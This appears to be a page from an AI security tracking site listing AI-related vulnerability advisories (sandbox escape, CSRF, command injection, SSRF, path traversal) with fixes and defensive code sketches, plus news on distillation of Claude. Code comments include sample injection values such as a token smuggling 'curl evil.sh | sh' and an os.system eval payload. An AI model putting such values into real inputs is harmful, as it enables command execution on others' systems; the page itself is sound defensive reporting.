aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI & LLM Vulnerabilities

Security vulnerabilities, privacy incidents, safety concerns, and policy updates affecting LLMs and AI agents.

1453 items

CVE-2026-27597: Enclave is a secure JavaScript sandbox designed for safe AI agent code execution.

critical vulnerability
security
Feb 24, 2026
CVE-2026-27597

Enclave is a secure JavaScript sandbox designed to safely run code from AI agents, but versions before 2.11.1 had a vulnerability that allowed attackers to escape the security boundaries and achieve RCE (remote code execution, where an attacker can run commands on a system they don't own). This weakness is related to code injection (CWE-94, a type of bug where untrusted input is used to generate code that gets executed).

Fix: Update to version 2.11.1 or later, where the issue has been fixed.

NVD/CVE Database
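The CWE-94 classification above covers any flow where untrusted input is executed as code. A minimal illustration of the pattern and its usual remedy, parse instead of evaluate (in Python rather than the sandbox's JavaScript; the function names are hypothetical):

```python
import ast

def eval_untrusted(expr: str):
    # CWE-94 pattern: untrusted text reaches an evaluator that runs it as
    # code, so "__import__('os').system('...')" would actually execute.
    return eval(expr)

def parse_untrusted(expr: str):
    # Safer: ast.literal_eval accepts only Python literals (numbers,
    # strings, lists, dicts, ...) and raises ValueError on anything
    # executable.
    return ast.literal_eval(expr)
```

In a sandbox like Enclave, the escape typically abuses an evaluator or object reachable from inside the sandbox; the same parse-don't-evaluate principle applies.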

CVE-2026-27609: Parse Dashboard is a standalone dashboard for managing Parse Server apps.

high vulnerability
security
Feb 24, 2026
CVE-2026-27609

Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 have a CSRF vulnerability (cross-site request forgery, where an attacker tricks a logged-in user into unknowingly sending requests to a website). An attacker can create a malicious webpage that, when visited by someone authenticated to Parse Dashboard, forces their browser to send unwanted requests to the AI Agent API endpoint without their knowledge. This vulnerability is fixed in version 9.0.0-alpha.8 and later.

CVE-2026-27608: Parse Dashboard is a standalone dashboard for managing Parse Server apps.

high vulnerability
security
Feb 24, 2026
CVE-2026-27608

Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 have a security flaw in the AI Agent API endpoint (a feature for managing Parse Server apps) where authorization checks are missing, allowing authenticated users to access other apps' data and read-only users to perform write and delete operations they shouldn't be allowed to do. Only dashboards with the agent feature enabled are vulnerable to this issue.

CVE-2026-27595: Parse Dashboard is a standalone dashboard for managing Parse Server apps.

critical vulnerability
security
Feb 24, 2026
CVE-2026-27595

Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 have security vulnerabilities in the AI Agent API endpoint that allow unauthenticated attackers to read and write data from any connected database using the master key (a special admin credential that grants full access). The agent feature must be enabled to be vulnerable, so dashboards without it are safe.

GHSA-299v-8pq9-5gjq: New API has Potential XSS in its MarkdownRenderer component

high vulnerability
security
Feb 23, 2026
CVE-2026-25802

A security vulnerability exists in the `MarkdownRenderer.jsx` component, which uses `dangerouslySetInnerHTML` (a React feature that inserts HTML directly without filtering) to display content generated by the AI model, allowing XSS (cross-site scripting, where attackers inject malicious code that runs in a user's browser). If the model outputs code containing `<script>` tags, those scripts execute automatically, potentially redirecting users or performing other harmful actions; the problem persists even after closing the chat because the malicious script is saved in the chat history.

Anthropic accuses Chinese AI labs of mining Claude as US debates AI chip exports

high incident
security, policy

OpenAI debated calling police about suspected Canadian shooter’s chats

info incident
safety, policy

CVE-2026-27487: OpenClaw is a personal AI assistant.

high vulnerability
security
Feb 21, 2026
CVE-2026-27487

OpenClaw, a personal AI assistant, had a security flaw in versions 2026.2.13 and below on macOS where OAuth tokens (authentication credentials that prove you're logged in) could be used to inject malicious OS commands (commands that run at the operating system level) into the credential refresh process. An attacker could exploit this by crafting a specially designed token to execute arbitrary commands on the affected system.
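The injection class described above can be sketched generically (Python, with a hypothetical `credstore` command standing in for the real macOS keychain tooling; this is not OpenClaw's code):

```python
import shlex

def refresh_command_unsafe(token: str) -> str:
    # Vulnerable pattern: the token is spliced into a shell string, so a
    # value like "x; curl evil.sh | sh" smuggles in extra commands.
    return f"credstore refresh --token {token}"

def refresh_command_safe(token: str) -> list[str]:
    # Passing argv as a list (and never using shell=True with subprocess)
    # keeps the token a single argument, whatever characters it contains.
    return ["credstore", "refresh", "--token", token]

def refresh_command_quoted(token: str) -> str:
    # If a shell string is unavoidable, quote every untrusted piece.
    return f"credstore refresh --token {shlex.quote(token)}"
```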

CVE-2026-27189: OpenSift is an AI study tool that sifts through large datasets using semantic search and generative AI.

medium vulnerability
security
Feb 20, 2026
CVE-2026-27189

OpenSift is an AI study tool that uses semantic search (finding information based on meaning rather than exact keyword matches) and generative AI to analyze large datasets. Versions 1.1.2-alpha and earlier have a vulnerability where multiple operations happening at the same time can corrupt or lose data in local JSON files (a common data storage format), affecting study notes, quizzes, flashcards, and user accounts.
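A common mitigation for this corruption class is to write each JSON file atomically, so readers never observe a half-written file. A sketch under that assumption (not OpenSift's actual code; full protection against concurrent writers additionally needs file locking):

```python
import json
import os
import tempfile

def save_json_atomic(path: str, data) -> None:
    # Write to a temporary file in the same directory, then atomically
    # replace the target; os.replace is atomic on POSIX and Windows.
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp = tempfile.mkstemp(dir=directory, suffix=".tmp")
    try:
        with os.fdopen(fd, "w") as f:
            json.dump(data, f)
        os.replace(tmp, path)
    except BaseException:
        os.unlink(tmp)  # clean up the temp file if anything failed
        raise
```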

CVE-2026-27170: OpenSift is an AI study tool that sifts through large datasets using semantic search and generative AI.

high vulnerability
security
Feb 20, 2026
CVE-2026-27170

OpenSift, an AI study tool that searches through large datasets using semantic search (finding similar content based on meaning) and generative AI, has a vulnerability in versions 1.1.2-alpha and below where it can be tricked into requesting unsafe internet addresses through its URL ingest feature (the part that accepts web links as input). An attacker could exploit this to access private or local network resources from the computer running OpenSift.
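A typical defense for this SSRF class is to resolve the requested host and reject private ranges before fetching. A hedged sketch (not OpenSift's actual fix; production code must also guard against DNS answers changing between the check and the fetch):

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_url(url: str) -> bool:
    # Reject non-HTTP schemes, then resolve the host and refuse private,
    # loopback, and link-local addresses before any request is made.
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            return False
    return True
```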

CVE-2026-27169: OpenSift is an AI study tool that sifts through large datasets using semantic search and generative AI.

high vulnerability
security
Feb 20, 2026
CVE-2026-27169

OpenSift, an AI study tool that uses semantic search (finding information by meaning rather than exact keywords) and generative AI to analyze large datasets, has a vulnerability in versions 1.1.2-alpha and below where untrusted content is rendered unsafely in the chat interface, allowing XSS (cross-site scripting, where attackers inject malicious code that runs in a user's browser). An attacker who can modify stored study materials could execute JavaScript code when a legitimate user views that content, potentially letting the attacker perform actions as that user within the application.

CVE-2026-2635: MLflow Use of Default Password Authentication Bypass Vulnerability.

high vulnerability
security
Feb 20, 2026
CVE-2026-2635

MLflow contains a vulnerability (CVE-2026-2635) where hard-coded default credentials are stored in the basic_auth.ini file, allowing remote attackers to bypass authentication without needing valid login information and potentially execute code with administrator privileges. This flaw exploits the use of default passwords, a common security mistake where systems ship with unchangeable built-in login credentials.

CVE-2026-2492: TensorFlow HDF5 Library Uncontrolled Search Path Element Local Privilege Escalation Vulnerability.

high vulnerability
security
Feb 20, 2026
CVE-2026-2492

TensorFlow has a vulnerability where it loads plugins from an unsafe location, allowing attackers who already have low-level access to a system to gain higher privileges (privilege escalation, where an attacker gains elevated permissions to do things they normally couldn't). An attacker exploiting this flaw could run arbitrary code (any commands they choose) with the same permissions as the target user.

CVE-2026-2033: MLflow Tracking Server Artifact Handler Directory Traversal Remote Code Execution Vulnerability.

critical vulnerability
security
Feb 20, 2026
CVE-2026-2033 (EPSS: 15.6%)

MLflow Tracking Server has a directory traversal (a flaw where an attacker uses special path characters like '../' to access files outside intended directories) vulnerability in its artifact file handler that allows unauthenticated attackers to execute arbitrary code on the server. The vulnerability exists because the server doesn't properly validate file paths before using them in operations, letting attackers run code with the permissions of the service account running MLflow.
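The standard guard against this traversal class is to canonicalize the requested path and verify it stays under the artifact root. A generic sketch (not MLflow's actual handler; names are illustrative):

```python
import os

def resolve_artifact(root: str, requested: str) -> str:
    # Canonicalize both paths, then verify the result is still inside the
    # artifact root; '../' sequences would otherwise escape a naive
    # string-prefix check.
    root_real = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root_real, requested))
    if os.path.commonpath([full, root_real]) != root_real:
        raise PermissionError(f"path escapes artifact root: {requested}")
    return full
```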

GHSA-cxpw-2g23-2vgw: OpenClaw: ACP prompt-size checks missing in local stdio bridge could reduce responsiveness with very large inputs

medium vulnerability
security
Feb 20, 2026
CVE-2026-27576

OpenClaw's ACP bridge (a local communication protocol for IDE integrations) didn't check prompt size limits before processing, causing the system to accept and forward extremely large text blocks that could slow down local sessions and increase API costs. The vulnerability only affects local clients sending unusually large inputs, with no remote attack risk.

GHSA-wh2j-26j7-9728: Google Cloud Vertex AI has a vulnerability involving predictable bucket naming

high vulnerability
security
Feb 20, 2026
CVE-2026-2473

This advisory describes a vulnerability in Google Cloud Vertex AI related to predictable bucket naming (a bucket is a container for storing data in cloud storage). The content provided explains the framework used to assess vulnerability severity through metrics like attack vector, complexity, and required privileges, but does not describe the actual vulnerability details, its impact, or how it affects users.

GHSA-qv8j-hgpc-vrq8: Google Cloud Vertex AI SDK affected by Stored Cross-Site Scripting (XSS)

high vulnerability
security
Feb 20, 2026
CVE-2026-2472

This advisory describes a stored XSS (cross-site scripting, where malicious code is saved and executed when users view a webpage) vulnerability in Google Cloud Vertex AI SDK. The text provided explains the CVSS scoring framework (a 0-10 rating system for vulnerability severity) used to evaluate this vulnerability, covering factors like how an attacker could exploit it, what privileges they need, and what systems could be impacted.

GHSA-q5fh-2hc8-f6rq: Ray dashboard DELETE endpoints allow unauthenticated browser-triggered DoS (Serve shutdown / job deletion)

medium vulnerability
security
Feb 20, 2026
CVE-2026-27482

Ray's dashboard HTTP server (a web interface for monitoring Ray clusters) doesn't block DELETE requests from browsers, even though it blocks POST and PUT requests. This allows someone on the same network or using DNS rebinding (tricking a domain to point to a local address) to shut down Serve (Ray's serving system) or delete jobs without authentication, since token-based auth is disabled by default. The attack requires no user interaction beyond visiting a malicious webpage.
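The underlying mistake is a denylist of unsafe methods; an allowlist of safe methods avoids it. A generic sketch of that design choice (not Ray's actual code; parameter names are illustrative):

```python
import hmac

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}

def allow_dashboard_request(method: str, token, expected_token: str) -> bool:
    # Allowlist the read-only methods and require the auth token for
    # every state-changing one; the original bug denylisted POST/PUT and
    # forgot DELETE, which is exactly the failure a denylist invites.
    if method.upper() in SAFE_METHODS:
        return True
    return token is not None and hmac.compare_digest(token, expected_token)
```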

GHSA-r6h2-5gqq-v5v6: OpenClaw: Reject symlinks in local skill packaging script

medium vulnerability
security
Feb 20, 2026
CVE-2026-27485

OpenClaw's skill packaging script had a vulnerability where it followed symlinks (shortcuts to files stored elsewhere on a computer) while building `.skill` archives, potentially including unintended files from outside the skill directory. This issue only affects local skill authors during packaging and has low severity since it cannot be triggered remotely through the normal OpenClaw system.
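The fix class here is to refuse symlinks while walking the skill directory. A generic sketch (not OpenClaw's actual packaging script):

```python
import os

def collect_skill_files(skill_dir: str) -> list[str]:
    # Refuse symlinked files and prune symlinked directories so the
    # archive can only ever contain real files under skill_dir.
    files = []
    for dirpath, dirnames, filenames in os.walk(skill_dir):
        dirnames[:] = [d for d in dirnames
                       if not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                raise ValueError(f"refusing to package symlink: {path}")
            files.append(path)
    return files
```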

GHSA-wh94-p5m6-mr7j: OpenClaw Discord moderation authorization used untrusted sender identity in tool-driven flows

low vulnerability
security
Feb 20, 2026
CVE-2026-27484

OpenClaw, a Discord moderation bot package, had a security flaw where moderation actions like timeout, kick, and ban used untrusted sender identity from user requests instead of verified system context, allowing non-admin users to spoof their identity and perform these actions. The vulnerability affected all versions up to 2026.2.17 and was fixed in version 2026.2.18.


Fix (CVE-2026-27609): Update to version 9.0.0-alpha.8 or later, which adds CSRF middleware (code that checks requests are legitimate) to the agent endpoint and embeds a CSRF token (a secret code) in the dashboard page. Alternatively, remove the `agent` configuration block from your dashboard configuration file as a temporary workaround.

NVD/CVE Database
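The token-based defense this fix describes can be sketched generically (Python; not Parse Dashboard's implementation, with session handling simplified to a dict):

```python
import hmac
import secrets

def issue_csrf_token(session: dict) -> str:
    # Generate an unguessable per-session token and embed it in the page;
    # a cross-site attacker cannot read the page, so they cannot echo it.
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token

def check_csrf(session: dict, submitted: str) -> bool:
    expected = session.get("csrf_token", "")
    # compare_digest avoids leaking the token through timing differences.
    return bool(expected) and hmac.compare_digest(expected, submitted)
```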

Fix (CVE-2026-27608): Update to version 9.0.0-alpha.8 or later, which adds authorization checks and restricts read-only users to a limited key with write permissions removed server-side (the server prevents writes even if requested). As a temporary workaround, remove the `agent` configuration block from your dashboard configuration file.

NVD/CVE Database

Fix (CVE-2026-27595): Upgrade to version 9.0.0-alpha.8 or later, which adds authentication, CSRF validation (protection against forged requests), and per-app authorization middleware to the agent endpoint. Alternatively, remove or comment out the agent configuration block from your Parse Dashboard configuration file as a temporary workaround.

NVD/CVE Database

Fix (CVE-2026-25802): The advisory lists only potential workarounds rather than a confirmed patch: place the preview in an iframe sandbox (a restricted container that limits what code can do) and purify dangerous HTML strings before rendering (clean the HTML to remove harmful elements before displaying it).

GitHub Advisory Database
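The "purify before rendering" workaround reduces, at minimum, to escaping untrusted markup. A sketch of the core idea (Python's `html.escape` standing in for a real sanitizer; the vulnerable component is React/JSX, where an allowlist sanitizer such as DOMPurify is the usual choice, since escaping alone also disables legitimate formatting):

```python
import html

def render_model_output(text: str) -> str:
    # Escape the AI model's output so embedded markup displays as text
    # instead of executing: '<script>' becomes '&lt;script&gt;'.
    return html.escape(text)
```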
Feb 23, 2026

Anthropic accused three Chinese AI companies (DeepSeek, Moonshot AI, and MiniMax) of using distillation (a technique where one AI model learns from another by analyzing its outputs) to illegally extract capabilities from Claude, creating over 24,000 fake accounts and generating millions of interactions. The alleged theft targeted Claude's most advanced features, such as reasoning, tool use, and coding, and raises security concerns because stolen models may lack safeguards against misuse such as bioweapon development.

Fix: Anthropic stated it will 'continue to invest in defenses that make distillation attacks harder to execute and easier to identify,' and is calling on 'a coordinated response across the AI industry, cloud providers, and policymakers.' The company also argues that export controls on advanced AI chips to China would limit both direct model training and the scale of such distillation attacks.

TechCrunch
Feb 21, 2026

OpenAI's monitoring tools flagged an 18-year-old user's chats on ChatGPT (a large language model chatbot) that described gun violence, leading to the account being banned in June 2025. The company debated whether to alert Canadian police but decided the chats didn't meet reporting criteria, though OpenAI later contacted authorities after the user allegedly killed eight people in a mass shooting in Canada.

TechCrunch

Fix (CVE-2026-27487): Update to version 2026.2.14 or later, where the issue has been fixed.

NVD/CVE Database

Fix (CVE-2026-27189): Upgrade to version 1.1.3-alpha or later.

NVD/CVE Database

Fix (CVE-2026-27170): Upgrade to version 1.1.3-alpha or later. As a temporary workaround for trusted local-only exceptions, set OPENSIFT_ALLOW_PRIVATE_URLS=true, but use this setting with caution.

NVD/CVE Database

Fix (CVE-2026-27169): Upgrade to version 1.1.3-alpha or later.

NVD/CVE Database

Fix (CVE-2026-27576): The patched version 2026.2.18 enforces a 2 MiB (2-megabyte) prompt-text limit before combining text blocks, counts newline separator bytes during size checks, retains final message-size validation before sending to the chat service, prevents stale session state when oversized prompts are rejected, and adds regression tests for oversize rejection and cleanup.

GitHub Advisory Database
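The byte accounting the patch describes, text bytes plus the newline separators that join the blocks, can be sketched as follows (hypothetical function names, not OpenClaw's code):

```python
MAX_PROMPT_BYTES = 2 * 1024 * 1024  # 2 MiB limit from the advisory

def combined_size(blocks: list[str]) -> int:
    # Count the UTF-8 bytes of every block plus one newline separator
    # byte between adjacent blocks, matching what is actually sent.
    text_bytes = sum(len(b.encode("utf-8")) for b in blocks)
    separators = max(len(blocks) - 1, 0)
    return text_bytes + separators

def accept_prompt(blocks: list[str]) -> bool:
    # Reject before combining, so oversized input never reaches the
    # chat service or lingers in session state.
    return combined_size(blocks) <= MAX_PROMPT_BYTES
```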

Fix (CVE-2026-27482): Update to Ray 2.54.0 or later. Fix PR: https://github.com/ray-project/ray/pull/60526

GitHub Advisory Database

Fix (CVE-2026-27485): Symlinks are now rejected during skill packaging, regression tests cover the symlinked-file and symlinked-directory cases, and the packaging guidance documents the restriction. The fix is available in commits c275932aa4230fb7a8212fe1b9d2a18424874b3f and ee1d6427b544ccadd73e02b1630ea5c29ba9a9f0, with the patched version planned for release as openclaw@2026.2.18.

GitHub Advisory Database

Fix (CVE-2026-27484): Update to version 2026.2.18 or later. Moderation authorization now uses the trusted sender context (requesterSenderId) instead of untrusted action parameters, and permission checks verify the bot has the required guild capabilities for each action.

GitHub Advisory Database
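The corrected pattern, authorizing on platform-verified identity rather than an attacker-controlled field, can be sketched generically (hypothetical names; not OpenClaw's code):

```python
def authorize_moderation(action: dict, requester_sender_id: str,
                         admin_ids: set) -> bool:
    # The action payload's self-reported sender field (e.g.
    # action["sender_id"]) is deliberately ignored: anyone can forge it.
    # Authorization uses only the identity the platform itself attached
    # to the request (requester_sender_id).
    return requester_sender_id in admin_ids
```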